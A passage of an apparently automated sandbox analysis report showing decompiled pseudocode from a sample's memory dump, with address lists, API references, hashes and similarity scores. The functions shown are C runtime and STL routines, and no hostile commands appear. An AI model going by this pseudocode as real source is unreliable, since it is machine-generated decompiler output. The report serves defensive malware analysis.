																							if( *(_t444 + 8) ==  *_t415) {
																								break;
																							}
																							_t470 = _v716;
																							_t437 = _t437 + 1;
																							_t337 =  *_t415;
																							 *_t470 = _v728;
																							_v720 = _t415[1];
																							_t415 = _t470 + 8;
																							 *((intOrPtr*)(_t470 + 4)) = _v720;
																							_t375 = _v744;
																							_t469 = _v732;
																							_v728 = _t337;
																							_v716 = _t415;
																							__eflags = _t437 - 5;
																							if(_t437 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t437 - 5;
																							if(__eflags == 0) {
																								_t328 = E6E1D3BB2(_t375, _t437, _t444, _t469, __eflags, _t500, _v712, 1, 0x6e1f4fa0, 0x7f,  &_v536,  *(_t444 + 8), 1);
																								_t484 = _t484 + 0x1c;
																								__eflags = _t328;
																								if(_t328 == 0) {
																									_t416 = _v712;
																								} else {
																									_t330 = _v712;
																									do {
																										 *(_t474 + _t330 * 2 - 0x20c) =  *(_t474 + _t330 * 2 - 0x20c) & 0x000001ff;
																										_t330 = _t330 + 1;
																										__eflags = _t330 - 0x7f;
																									} while (_t330 < 0x7f);
																									_t332 = E6E1ABA27( &_v536,  *0x6e218194, 0xfe);
																									_t484 = _t484 + 0xc;
																									__eflags = _t332;
																									_t416 = 0 | _t332 == 0x00000000;
																								}
																								_t469[1] = _t416;
																								 *_t469 =  *(_t444 + 8);
																							}
																							 *(_t444 + 0x18) = _t469[1];
																							goto L122;
																						}
																						__eflags = _t437;
																						if(_t437 != 0) {
																							 *_t469 =  *(_t469 + _t437 * 8);
																							_t469[1] =  *(_t469 + 4 + _t437 * 8);
																							 *(_t469 + _t437 * 8) = _v728;
																							 *(_t469 + 4 + _t437 * 8) = _v720;
																						}
																						goto L110;
																					}
																					L122:
																					_t306 = _t375 * 0xc;
																					_t199 = _t306 + 0x6e1f5028; // 0x6e1616e7
																					 *0x6e1ee1b4(_t444);
																					_t308 =  *((intOrPtr*)( *_t199))();
																					_t408 = _v736;
																					__eflags = _t308;
																					if(_t308 == 0) {
																						__eflags = _t408 - 0x6e218258;
																						if(_t408 != 0x6e218258) {
																							_t468 = _t375 + _t375;
																							__eflags = _t468;
																							asm("lock xadd [eax], ecx");
																							if(_t468 != 0) {
																								goto L129;
																							} else {
																								E6E1D1BE4( *((intOrPtr*)(_t444 + 0x28 + _t468 * 8)));
																								E6E1D1BE4( *((intOrPtr*)(_t444 + 0x24 + _t468 * 8)));
																								E6E1D1BE4( *(_t444 + 0xa0 + _t375 * 4));
																								_t411 = _v712;
																								 *(_v724 + _t444) = _t411;
																								 *(_t444 + 0xa0 + _t375 * 4) = _t411;
																							}
																						}
																						_t409 = _v740;
																						 *_t409 = 1;
																						 *((intOrPtr*)(_t444 + 0x28 + (_t375 + _t375) * 8)) = _t409;
																					} else {
																						 *((intOrPtr*)(_v724 + _t444)) = _t408;
																						E6E1D1BE4( *(_t444 + 0xa0 + _t375 * 4));
																						 *(_t444 + 0xa0 + _t375 * 4) = _v748;
																						E6E1D1BE4(_v740);
																						 *(_t444 + 8) = _v752;
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		} else {
																			L125:
																			__eflags = _v16 ^ _t474;
																			return E6E1A93EA(_v16 ^ _t474);
																		}
																		goto L137;
																	}
																	asm("sbb eax, eax");
																	_t286 = _t285 | 0x00000001;
																	__eflags = _t286;
																	goto L93;
																}
															} else {
																_t339 = _t459 + _t459;
																__eflags = _t339 - 0x106;
																if(_t339 >= 0x106) {
																	E6E1AA1F9();
																	goto L83;
																} else {
																	 *((short*)(_t473 + _t339 - 0x10c)) = 0;
																	_t341 =  &_v276;
																	_push(_t341);
																	_push(_v456);
																	_push(_t440);
																	L84();
																	_t392 = _v452;
																	_t479 = _t481 + 0xc;
																	__eflags = _t341;
																	if(_t341 != 0) {
																		_t392 = _t392 + 1;
																		_v452 = _t392;
																	}
																	L55:
																	_t456 = _t370 + _t459 * 2;
																	_t270 =  *_t456 & 0x0000ffff;
																	_t431 = _t270;
																	__eflags = _t270;
																	if(_t270 != 0) {
																		_t456 = _t456 + 2;
																		__eflags = _t456;
																		_t431 =  *_t456 & 0x0000ffff;
																	}
																	__eflags = _t431;
																	if(_t431 != 0) {
																		continue;
																	} else {
																		__eflags = _t392;
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																			break;
																		}
																		goto L81;
																	}
																}
															}
														}
													} else {
														_t342 = 0x3b;
														__eflags =  *_t370 - _t342;
														if( *_t370 != _t342) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L137;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t456;
						if(_t456 != 0) {
							_push(_t456);
							_push(_t250);
							_push(_t440);
							L84();
						}
						L81:
						__eflags = _v12 ^ _t473;
						return E6E1A93EA(_v12 ^ _t473);
					}
				}
				L137:
			}

0x6e1d0995
0x6e1d0995
0x6e1d099d
0x6e1d099e
0x6e1d09a7
0x6e1d09af
0x6e1d09b1
0x6e1d09b3
0x6e1d09b6
0x6e1d0ad3
0x6e1d0ad6
0x6e1d09bc
0x6e1d09bc
0x6e1d09bd
0x6e1d09bd
0x6e1d09c0
0x6e1d09c3
0x6e1d09c5
0x6e1d09c8
0x6e1d09cb
0x6e1d09cd
0x6e1d09d0
0x6e1d09d5
0x6e1d09e3
0x6e1d09ed
0x6e1d09f0
0x6e1d09f3
0x6e1d09f3
0x6e1d09fe
0x6e1d0a03
0x6e1d0a08
0x00000000
0x6e1d0a0e
0x6e1d0a11
0x6e1d0a11
0x6e1d0a14
0x6e1d0a16
0x6e1d0a19
0x6e1d0a1b
0x6e1d0a1b
0x6e1d0a1b
0x6e1d0a1e
0x6e1d0a1e
0x6e1d0a1e
0x6e1d0a24
0x00000000
0x00000000
0x6e1d0a29
0x6e1d0a40
0x6e1d0a40
0x6e1d0a2b
0x6e1d0a2b
0x6e1d0a33
0x00000000
0x6e1d0a35
0x6e1d0a35
0x6e1d0a38
0x6e1d0a3e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d0a3e
0x6e1d0a33
0x6e1d0a49
0x6e1d0a49
0x6e1d0a4e
0x6e1d0a53
0x6e1d0a57
0x6e1d0a63
0x6e1d0a66
0x6e1d0a69
0x6e1d0a73
0x6e1d0a7b
0x6e1d0a83
0x00000000
0x6e1d0a89
0x6e1d0a8d
0x6e1d0ad8
0x6e1d0ae1
0x6e1d0ae4
0x6e1d0ae6
0x6e1d0aea
0x6e1d0aee
0x6e1d0af3
0x6e1d0af8
0x6e1d0aee
0x6e1d0afc
0x6e1d0afe
0x6e1d0b00
0x6e1d0b04
0x6e1d0b05
0x6e1d0b0a
0x6e1d0b0f
0x6e1d0b05
0x6e1d0b12
0x6e1d0b15
0x6e1d0b18
0x6e1d0b1b
0x6e1d0b1e
0x6e1d0a8f
0x6e1d0a92
0x6e1d0a95
0x6e1d0a97
0x6e1d0a9b
0x6e1d0a9f
0x6e1d0aa4
0x6e1d0aa9
0x6e1d0a9f
0x6e1d0aaf
0x6e1d0ab1
0x6e1d0ab6
0x6e1d0abb
0x6e1d0ac0
0x6e1d0ab6
0x6e1d0ac1
0x6e1d0ac5
0x6e1d0ac5
0x6e1d0ac8
0x6e1d0acc
0x6e1d0acf
0x6e1d0acf
0x00000000
0x6e1d0ad2
0x00000000
0x6e1d0a83
0x6e1d0a44
0x6e1d0a46
0x6e1d0a46
0x00000000
0x6e1d0a46
0x6e1d0b25
0x6e1d0b26
0x6e1d0b27
0x6e1d0b28
0x6e1d0b29
0x6e1d0b2a
0x6e1d0b2f
0x6e1d0b33
0x6e1d0b35
0x6e1d0b3b
0x6e1d0b42
0x6e1d0b45
0x6e1d0b48
0x6e1d0b49
0x6e1d0b4a
0x6e1d0b4d
0x6e1d0b4e
0x6e1d0b51
0x6e1d0b57
0x6e1d0b59
0x6e1d0b7e
0x6e1d0b88
0x6e1d0b8e
0x6e1d0b90
0x6e1d0b96
0x6e1d0b98
0x6e1d0df8
0x6e1d0df9
0x00000000
0x6e1d0b9e
0x6e1d0b9e
0x6e1d0ba2
0x6e1d0d10
0x6e1d0d2d
0x6e1d0d32
0x6e1d0d35
0x6e1d0d37
0x6e1d0d3d
0x6e1d0d3f
0x6e1d0d42
0x6e1d0d44
0x6e1d0d4a
0x6e1d0d4a
0x6e1d0d4c
0x6e1d0dd3
0x6e1d0dd3
0x6e1d0d52
0x6e1d0d52
0x6e1d0d54
0x6e1d0d5a
0x6e1d0d5d
0x6e1d0d60
0x6e1d0d66
0x00000000
0x00000000
0x6e1d0d68
0x6e1d0d6c
0x6e1d0d95
0x6e1d0d97
0x6e1d0d6e
0x6e1d0d6e
0x6e1d0d72
0x6e1d0d76
0x6e1d0d7d
0x6e1d0d83
0x00000000
0x6e1d0d85
0x6e1d0d85
0x6e1d0d88
0x6e1d0d8b
0x6e1d0d93
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d0d93
0x6e1d0d83
0x6e1d0da2
0x6e1d0da2
0x6e1d0da4
0x6e1d0dd2
0x6e1d0dd2
0x00000000
0x6e1d0da6
0x6e1d0da6
0x6e1d0dac
0x6e1d0dad
0x6e1d0dae
0x6e1d0daf
0x6e1d0db4
0x6e1d0dba
0x6e1d0dbd
0x6e1d0dbf
0x6e1d0dc8
0x6e1d0dca
0x6e1d0dc1
0x6e1d0dc1
0x00000000
0x6e1d0dc2
0x6e1d0dbf
0x00000000
0x6e1d0da4
0x6e1d0d9b
0x6e1d0d9d
0x6e1d0da0
0x00000000
0x6e1d0da0
0x6e1d0dd9
0x6e1d0dd9
0x6e1d0dda
0x6e1d0ddd
0x6e1d0de3
0x6e1d0de3
0x6e1d0dec
0x6e1d0dee
0x00000000
0x6e1d0df0
0x6e1d0df0
0x6e1d0df2
0x00000000
0x6e1d0df4
0x6e1d0df4
0x6e1d0df2
0x6e1d0dee
0x00000000
0x6e1d0ba8
0x6e1d0ba8
0x6e1d0bad
0x00000000
0x6e1d0bb3
0x6e1d0bb3
0x6e1d0bb8
0x00000000
0x6e1d0bbe
0x6e1d0bbe
0x6e1d0bc4
0x6e1d0bc9
0x6e1d0bcb
0x6e1d0bd2
0x6e1d0bd3
0x6e1d0bd5
0x00000000
0x00000000
0x6e1d0bdb
0x6e1d0bdb
0x6e1d0bdf
0x6e1d0be5
0x00000000
0x6e1d0beb
0x6e1d0bed
0x6e1d0bee
0x6e1d0bf1
0x00000000
0x6e1d0bf7
0x6e1d0bf7
0x6e1d0bfd
0x6e1d0c02
0x6e1d0c0c
0x6e1d0c10
0x6e1d0c15
0x6e1d0c18
0x6e1d0c1a
0x00000000
0x6e1d0c1c
0x6e1d0c1c
0x6e1d0c1e
0x6e1d0c21
0x6e1d0c21
0x6e1d0c24
0x6e1d0c27
0x6e1d0c27
0x6e1d0c32
0x6e1d0c34
0x6e1d0c36
0x00000000
0x00000000
0x6e1d0c36
0x00000000
0x6e1d0c38
0x6e1d0c38
0x6e1d0c3e
0x6e1d0c41
0x6e1d0c41
0x6e1d0c4f
0x6e1d0c58
0x6e1d0c5d
0x6e1d0c63
0x6e1d0c66
0x6e1d0c67
0x6e1d0c69
0x6e1d0c77
0x6e1d0c77
0x6e1d0c7e
0x6e1d0cdf
0x00000000
0x6e1d0c80
0x6e1d0c80
0x6e1d0c8e
0x6e1d0c93
0x6e1d0c96
0x6e1d0c98
0x6e1d0e13
0x6e1d0e15
0x6e1d0e16
0x6e1d0e17
0x6e1d0e18
0x6e1d0e19
0x6e1d0e1a
0x6e1d0e1f
0x6e1d0e22
0x6e1d0e23
0x6e1d0e2b
0x6e1d0e32
0x6e1d0e35
0x6e1d0e36
0x6e1d0e39
0x6e1d0e3d
0x6e1d0e3e
0x6e1d0e41
0x6e1d0e51
0x6e1d0e74
0x6e1d0e79
0x6e1d0e7c
0x6e1d0e7e
0x6e1d1156
0x6e1d1156
0x00000000
0x6e1d0e84
0x6e1d0e84
0x6e1d0e87
0x6e1d0e87
0x6e1d0e8a
0x6e1d0e90
0x6e1d0e99
0x6e1d0e9b
0x6e1d0e9e
0x6e1d0ea5
0x6e1d0ea8
0x6e1d0eae
0x00000000
0x00000000
0x6e1d0eb0
0x6e1d0eb4
0x6e1d0edd
0x6e1d0edd
0x6e1d0eb6
0x6e1d0eb6
0x6e1d0eba
0x6e1d0ebe
0x6e1d0ec5
0x6e1d0ecb
0x00000000
0x6e1d0ecd
0x6e1d0ecd
0x6e1d0ed0
0x6e1d0ed3
0x6e1d0edb
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d0edb
0x6e1d0ecb
0x6e1d0eea
0x6e1d0eea
0x6e1d0eec
0x6e1d0ef5
0x6e1d0efb
0x6e1d0efe
0x6e1d0efe
0x6e1d0f01
0x6e1d0f04
0x6e1d0f04
0x6e1d0f14
0x6e1d0f22
0x6e1d0f27
0x6e1d0f2e
0x6e1d0f30
0x00000000
0x6e1d0f36
0x6e1d0f3c
0x6e1d0f49
0x6e1d0f52
0x6e1d0f65
0x6e1d0f6c
0x6e1d0f71
0x6e1d0f74
0x6e1d0f76
0x6e1d11d6
0x6e1d11dc
0x6e1d11dd
0x6e1d11de
0x6e1d11df
0x6e1d11e0
0x6e1d11e1
0x6e1d11e6
0x6e1d11e9
0x6e1d11f0
0x6e1d11f0
0x6e1d11f3
0x6e1d1209
0x6e1d1209
0x6e1d120c
0x6e1d11f5
0x6e1d11f5
0x6e1d11f5
0x6e1d11f8
0x6e1d1206
0x6e1d1208
0x6e1d11fa
0x6e1d11fa
0x6e1d11fd
0x00000000
0x6e1d11ff
0x6e1d1201
0x6e1d1203
0x6e1d1203
0x6e1d11fd
0x6e1d11f8
0x6e1d0f7c
0x6e1d0f7c
0x6e1d0f8a
0x6e1d0f8d
0x6e1d0fa3
0x6e1d0faa
0x6e1d0fb0
0x6e1d0f8f
0x6e1d0f8f
0x6e1d0f97
0x00000000
0x6e1d0f99
0x6e1d0f99
0x6e1d0f9f
0x6e1d0f9f
0x6e1d0f97
0x6e1d0fb6
0x6e1d0fbd
0x6e1d0fc0
0x6e1d10e0
0x6e1d10e3
0x6e1d10f0
0x6e1d10f3
0x6e1d10fb
0x6e1d10fb
0x6e1d10e5
0x6e1d10eb
0x6e1d10eb
0x6e1d0fc6
0x6e1d0fc6
0x6e1d0fcc
0x6e1d0fd4
0x6e1d0fd6
0x6e1d0fd9
0x6e1d0fe2
0x6e1d0feb
0x6e1d0ff1
0x6e1d0ff4
0x6e1d0ff6
0x00000000
0x00000000
0x6e1d0ff8
0x6e1d0ffe
0x6e1d0fff
0x6e1d100a
0x6e1d1012
0x6e1d101a
0x6e1d101d
0x6e1d1020
0x6e1d1026
0x6e1d102c
0x6e1d1032
0x6e1d1038
0x6e1d103b
0x00000000
0x00000000
0x6e1d103d
0x6e1d1062
0x6e1d1062
0x6e1d1065
0x6e1d1082
0x6e1d1087
0x6e1d108a
0x6e1d108c
0x6e1d10ca
0x6e1d108e
0x6e1d108e
0x6e1d1094
0x6e1d1099
0x6e1d10a1
0x6e1d10a2
0x6e1d10a2
0x6e1d10b9
0x6e1d10c0
0x6e1d10c3
0x6e1d10c5
0x6e1d10c5
0x6e1d10d0
0x6e1d10d6
0x6e1d10d6
0x6e1d10db
0x00000000
0x6e1d10db
0x6e1d103f
0x6e1d1041
0x6e1d1046
0x6e1d104c
0x6e1d1055
0x6e1d105e
0x6e1d105e
0x00000000
0x6e1d1041
0x6e1d10fe
0x6e1d10fe
0x6e1d1102
0x6e1d110a
0x6e1d1110
0x6e1d1113
0x6e1d1119
0x6e1d111b
0x6e1d1167
0x6e1d116d
0x6e1d1174
0x6e1d1174
0x6e1d117a
0x6e1d117e
0x00000000
0x6e1d1180
0x6e1d1184
0x6e1d118d
0x6e1d1199
0x6e1d11a7
0x6e1d11ad
0x6e1d11b0
0x6e1d11b0
0x6e1d117e
0x6e1d11bf
0x6e1d11c7
0x6e1d11d0
0x6e1d111d
0x6e1d1123
0x6e1d112d
0x6e1d113f
0x6e1d1146
0x6e1d1153
0x00000000
0x6e1d1153
0x00000000
0x6e1d111b
0x6e1d0f76
0x6e1d0eee
0x6e1d1158
0x6e1d115d
0x6e1d1166
0x6e1d1166
0x00000000
0x6e1d0eec
0x6e1d0ee5
0x6e1d0ee7
0x6e1d0ee7
0x00000000
0x6e1d0ee7
0x6e1d0c9e
0x6e1d0c9e
0x6e1d0ca1
0x6e1d0ca6
0x6e1d0e0e
0x00000000
0x6e1d0cac
0x6e1d0cae
0x6e1d0cb6
0x6e1d0cbc
0x6e1d0cbd
0x6e1d0cc3
0x6e1d0cc4
0x6e1d0cc9
0x6e1d0ccf
0x6e1d0cd2
0x6e1d0cd4
0x6e1d0cd6
0x6e1d0cd7
0x6e1d0cd7
0x6e1d0ce5
0x6e1d0ce5
0x6e1d0ce8
0x6e1d0ceb
0x6e1d0ced
0x6e1d0cf0
0x6e1d0cf2
0x6e1d0cf2
0x6e1d0cf5
0x6e1d0cf5
0x6e1d0cf8
0x6e1d0cfb
0x00000000
0x6e1d0d01
0x6e1d0d01
0x6e1d0d03
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d0d03
0x6e1d0cfb
0x6e1d0ca6
0x6e1d0c98
0x6e1d0c6b
0x6e1d0c6d
0x6e1d0c6e
0x6e1d0c71
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d0c71
0x6e1d0c69
0x6e1d0bf1
0x00000000
0x6e1d0be5
0x00000000
0x6e1d0d09
0x6e1d0bb8
0x6e1d0bad
0x6e1d0ba2
0x6e1d0b5b
0x6e1d0b5b
0x6e1d0b5d
0x6e1d0b5f
0x6e1d0b60
0x6e1d0b61
0x6e1d0b62
0x6e1d0b67
0x6e1d0dff
0x6e1d0e04
0x6e1d0e0d
0x6e1d0e0d
0x6e1d0b59
0x00000000

APIs

Part of subcall function 6E1D1C1E: HeapAlloc.KERNEL32(00000000,6E17DCEA,00000001,?,6E1A963B,6E17DCEA,?,6E186103,00000054,00000000,6E184386,?,00000000,?,?,00000058), ref: 6E1D1C50

_free.LIBCMT ref: 6E1D0AA4
_free.LIBCMT ref: 6E1D0ABB
_free.LIBCMT ref: 6E1D0AD8
_free.LIBCMT ref: 6E1D0AF3
_free.LIBCMT ref: 6E1D0B0A

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocHeap
String ID:
API String ID: 1835388192-0
Opcode ID: 54200c09fd55c188cbe57c9b5623cffe2d50698833e004af8ca8ce14bc26b9df
Instruction ID: a3a97e66f936e002aa13df797db6e62a2e294e166136d9327b85320cdf67eea7
Opcode Fuzzy Hash: 54200c09fd55c188cbe57c9b5623cffe2d50698833e004af8ca8ce14bc26b9df
Instruction Fuzzy Hash: 0A51E432A00605EFDB10CFA9C840BAA77FAFF54324F144569E409DB290F771E989EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E182211, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E182211(void* __ebx, char* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				void* _t25;
				char _t27;
				intOrPtr* _t40;
				char* _t43;
				intOrPtr* _t45;
				void* _t48;

				_t43 = __edx;
				E6E1A9DBF(0x6e1ea3b0, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t48 - 0x14, 0);
				 *(_t48 - 4) = 0;
				_t45 =  *0x6e238bd8;
				 *((intOrPtr*)(_t48 - 0x10)) = _t45;
				_t20 = E6E162171( *((intOrPtr*)(_t48 + 8)), E6E161F29(0, 0x6e238d28, _t45, __esi));
				_t47 = _t20;
				if(_t20 != 0) {
					L5:
					 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
					E6E18F30C(_t48 - 0x14);
					return E6E1A9D88(_t47);
				} else {
					if(_t45 == 0) {
						_push( *((intOrPtr*)(_t48 + 8)));
						_push(_t48 - 0x10);
						_t25 = E6E183565(0, _t45, _t47);
						_pop(_t40);
						__eflags = _t25 - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							_t27 =  *_t43;
							_push(0);
							 *_t40 = _t27;
							 *_t43 =  *_t40;
							return _t27;
						} else {
							_t47 =  *((intOrPtr*)(_t48 - 0x10));
							 *((intOrPtr*)(_t48 - 0x10)) = _t47;
							 *(_t48 - 4) = 1;
							E6E1911C1(__eflags, _t47);
							 *((intOrPtr*)( *_t47 + 4))();
							 *0x6e238bd8 = _t47;
							 *((intOrPtr*)(_t48 - 0x10)) = 0;
							 *(_t48 - 4) = 0;
							goto L5;
						}
					} else {
						_t47 = _t45;
						goto L5;
					}
				}
			}

0x6e182211
0x6e182218
0x6e182223
0x6e182228
0x6e182230
0x6e182236
0x6e182242
0x6e182247
0x6e18224b
0x6e18228c
0x6e18228c
0x6e182293
0x6e18229f
0x6e18224d
0x6e18224f
0x6e182255
0x6e18225b
0x6e18225c
0x6e182262
0x6e182263
0x6e182266
0x6e1822a0
0x6e1822a5
0x6e1822a6
0x6e1822a8
0x6e1822ab
0x6e1822ad
0x6e1822b0
0x6e182268
0x6e182268
0x6e18226b
0x6e18226e
0x6e182273
0x6e18227d
0x6e182280
0x6e182286
0x6e182289
0x00000000
0x6e182289
0x6e182251
0x6e182251
0x00000000
0x6e182251
0x6e18224f

APIs

__EH_prolog3.LIBCMT ref: 6E182218
std::_Lockit::_Lockit.LIBCPMT ref: 6E182223

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E182273
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182293
Concurrency::cancel_current_task.LIBCPMT ref: 6E1822A0

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: c855749f329cab3a8af92f33085475a656ccf94253a1ea9aedb5e168c1791845
Instruction ID: a1c5c04b8f7cacb13ccf52ad92906ac4f23d7afc9012219eb88af9d8b177d68d
Opcode Fuzzy Hash: c855749f329cab3a8af92f33085475a656ccf94253a1ea9aedb5e168c1791845
Instruction Fuzzy Hash: AC112B71900626DFCB06CFF898500EEBB797F45314B24094AE421EB290DB308AC5EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1826F0, Relevance: 7.6, APIs: 5, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1826F0(void* __ebx, signed char* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t21;
				signed char* _t44;
				intOrPtr* _t46;
				void* _t49;

				_t44 = __edx;
				E6E1A9DBF(0x6e1ea3b0, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t49 - 0x14, 0);
				 *(_t49 - 4) = 0;
				_t46 =  *0x6e238bd4;
				 *((intOrPtr*)(_t49 - 0x10)) = _t46;
				_t21 = E6E162171( *((intOrPtr*)(_t49 + 8)), E6E161F29(0, 0x6e22147c, _t46, __esi));
				_t48 = _t21;
				if(_t21 != 0) {
					L5:
					 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
					E6E18F30C(_t49 - 0x14);
					return E6E1A9D88(_t48);
				} else {
					if(_t46 == 0) {
						_push( *((intOrPtr*)(_t49 + 8)));
						_push(_t49 - 0x10);
						__eflags = E6E1626CD(0, _t46, _t48) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							return E6E17F71B( &(_t44[8]), _t44,  *_t44 & 0x000000ff);
						} else {
							_t48 =  *((intOrPtr*)(_t49 - 0x10));
							 *((intOrPtr*)(_t49 - 0x10)) = _t48;
							 *(_t49 - 4) = 1;
							E6E1911C1(__eflags, _t48);
							 *((intOrPtr*)( *_t48 + 4))();
							 *0x6e238bd4 = _t48;
							 *((intOrPtr*)(_t49 - 0x10)) = 0;
							 *(_t49 - 4) = 0;
							goto L5;
						}
					} else {
						_t48 = _t46;
						goto L5;
					}
				}
			}

0x6e1826f0
0x6e1826f7
0x6e182702
0x6e182707
0x6e18270f
0x6e182715
0x6e182721
0x6e182726
0x6e18272a
0x6e18276b
0x6e18276b
0x6e182772
0x6e18277e
0x6e18272c
0x6e18272e
0x6e182734
0x6e18273a
0x6e182742
0x6e182745
0x6e18277f
0x6e182784
0x6e182791
0x6e182747
0x6e182747
0x6e18274a
0x6e18274d
0x6e182752
0x6e18275c
0x6e18275f
0x6e182765
0x6e182768
0x00000000
0x6e182768
0x6e182730
0x6e182730
0x00000000
0x6e182730
0x6e18272e

APIs

__EH_prolog3.LIBCMT ref: 6E1826F7
std::_Lockit::_Lockit.LIBCPMT ref: 6E182702

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E182752
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182772
Concurrency::cancel_current_task.LIBCPMT ref: 6E18277F

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 5518e8f0ca169ca9227109ca0fd75ee9b632d1c5b94e872b0a8116ad29141877
Instruction ID: 95efa4473a0e03fdf37a2baab2f2eb4755bf8ab7ec64fe845c331970b74d54b9
Opcode Fuzzy Hash: 5518e8f0ca169ca9227109ca0fd75ee9b632d1c5b94e872b0a8116ad29141877
Instruction Fuzzy Hash: 00110275D0062ADBCF06DFE8C8508EEBB797F55314B204A49E465EB290DB308AC8EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E182379, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E182379(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				void* _t25;
				intOrPtr* _t38;
				intOrPtr _t41;
				intOrPtr* _t43;
				void* _t46;

				_t41 = __edx;
				E6E1A9DBF(0x6e1ea3b0, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t46 - 0x14, 0);
				 *(_t46 - 4) = 0;
				_t43 =  *0x6e238bc8;
				 *((intOrPtr*)(_t46 - 0x10)) = _t43;
				_t20 = E6E162171( *((intOrPtr*)(_t46 + 8)), E6E161F29(0, 0x6e238bdc, _t43, __esi));
				_t45 = _t20;
				if(_t20 != 0) {
					L5:
					 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
					E6E18F30C(_t46 - 0x14);
					return E6E1A9D88(_t45);
				} else {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t46 + 8)));
						_push(_t46 - 0x10);
						_t25 = E6E1834EF(0, _t43, _t45);
						_pop(_t38);
						__eflags = _t25 - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							 *_t38 = _t41;
							return _t38;
						} else {
							_t45 =  *((intOrPtr*)(_t46 - 0x10));
							 *((intOrPtr*)(_t46 - 0x10)) = _t45;
							 *(_t46 - 4) = 1;
							E6E1911C1(__eflags, _t45);
							 *((intOrPtr*)( *_t45 + 4))();
							 *0x6e238bc8 = _t45;
							 *((intOrPtr*)(_t46 - 0x10)) = 0;
							 *(_t46 - 4) = 0;
							goto L5;
						}
					} else {
						_t45 = _t43;
						goto L5;
					}
				}
			}

0x6e182379
0x6e182380
0x6e18238b
0x6e182390
0x6e182398
0x6e18239e
0x6e1823aa
0x6e1823af
0x6e1823b3
0x6e1823f4
0x6e1823f4
